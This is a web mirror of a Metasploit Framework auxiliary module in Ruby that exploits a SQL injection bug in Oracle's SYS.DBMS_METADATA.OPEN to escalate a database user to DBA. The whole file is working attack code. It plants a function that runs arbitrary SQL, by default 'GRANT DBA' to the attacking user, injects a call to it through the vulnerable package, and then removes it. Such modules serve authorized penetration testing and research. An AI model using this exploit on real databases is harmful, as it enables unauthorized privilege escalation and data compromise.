Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::ORACLE
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',
14
'Description' => %q{
15
This module will escalate a Oracle DB user to DBA by exploiting an sql injection
16
bug in the SYS.DBMS_METADATA.OPEN package/function.
17
},
18
'Author' => [ 'MC' ],
19
'License' => MSF_LICENSE,
20
'References' => [
21
[ 'URL', 'http://www.metasploit.com' ],
22
],
23
'DisclosureDate' => '2008-01-05',
24
'Notes' => {
25
'Stability' => [CRASH_SAFE],
26
'SideEffects' => [IOC_IN_LOGS],
27
'Reliability' => []
28
}
29
)
30
)
31
32
register_options(
33
[
34
OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
35
]
36
)
37
end
38
39
def run
40
return if !check_dependencies
41
42
name = Rex::Text.rand_text_alpha(1..10)
43
44
function = "
45
create or replace function #{datastore['DBUSER']}.#{name} return varchar2
46
authid current_user is pragma autonomous_transaction;
47
begin
48
execute immediate '#{datastore['SQL']}';
49
return '';
50
end;
51
"
52
53
package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual"
54
55
clean = "drop function #{name}"
56
57
print_status('Sending function...')
58
prepare_exec(function)
59
60
begin
61
print_status('Attempting sql injection on SYS.DBMS_METADATA.OPEN...')
62
prepare_exec(package)
63
rescue ::OCIError => e
64
if (e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/)
65
print_status("Removing function '#{name}'...")
66
prepare_exec(clean)
67
end
68
end
69
end
70
end
71
72